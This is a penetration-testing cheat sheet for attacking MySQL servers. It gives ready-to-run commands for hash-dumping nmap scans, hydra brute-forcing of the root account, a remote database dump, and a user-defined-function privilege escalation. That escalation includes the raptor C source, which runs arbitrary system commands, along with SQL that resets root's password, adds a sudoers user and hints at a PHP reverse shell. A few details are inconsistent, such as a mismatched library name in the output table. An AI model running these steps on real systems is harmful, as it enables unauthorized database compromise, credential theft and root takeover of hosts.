Target.Host.Service.DB.MySQL.txt

`` Scanning

    ~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-info,mysql-query,mysql-users,mysql-variables VAR_TARGET_HOST

    -- NOTE: mysql-enum is unreliable

`` Password Bruteforcing

    ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD mysql://VAR_TARGET_HOST

    -- With a list of targets
    ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD -M VAR_TARGET_HOSTS mysql

`` Dump

    ~$ mysqldump -h VAR_TARGET_HOST -u root -p --single-transaction --quick --lock-tables=false > dump.sql

`` Extension upload

    SELECT @@plugin_dir;

    SELECT 0x7f454c...00000 into dumpfile "/var/lib/mysql/udf.so";

    CREATE function sys_eval returns string soname 'udf.so';
    SELECT * from mysql.func where name = 'sys_eval';
    SELECT sys_eval('dir');
    DROP function sys_eval;

    echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'

`` raptor.c

    #include <stdio.h>
    #include <stdlib.h>

    enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

    typedef struct st_udf_args {
        unsigned int arg_count; // number of arguments
        enum Item_result *arg_type; // pointer to item_result
        char **args; // pointer to arguments
        unsigned long *lengths; // length of string args
        char *maybe_null; // 1 for maybe_null args
    } UDF_ARGS;

    typedef struct st_udf_init {
        char maybe_null; // 1 if func can return NULL
        unsigned int decimals; // for real functions
        unsigned long max_length; // for string functions
        char *ptr; // free ptr for func data
        char const_item; // 0 if result is constant
    } UDF_INIT;

    int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
    {
    if (args->arg_count != 1)
        return(0);
        system(args->args[0]);
        return(0);
    }

    char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
    {
        return(0);
    }


    $ gcc -fPIC -g -c raptor.c
    $ gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc
    $ xxd -p -c `stat --format="%s" raptor.so` raptor.so

    mysql> SELECT '<output of above command>' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'
    mysql> CREATE function do_cmd returns integer soname "raptor.so";
    mysql> SELECT do_cmd("echo 'root:root'|chpasswd");


    gcc -g -c raptor_udf2.c
    gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    mysql -u root
    mysql> use mysql;
    mysql> create table foo(line blob);
    mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
    mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
    mysql> create function do_system returns integer soname 'raptor_udf2.so';
    mysql> select * from mysql.func;
    +-----------+-----+----------------+----------+
    | name      | ret | dl             | type     |
    +-----------+-----+----------------+----------+
    | do_system |   2 | raptor_udf2-2.so | function |
    +-----------+-----+----------------+----------+
    mysql> select do_system('adduser toor');
    mysql> select do_system('echo "toor    ALL=(ALL) ALL" >> /etc/sudoers');
    mysql> select do_system('echo "toor:toor" | /usr/sbin/chpasswd');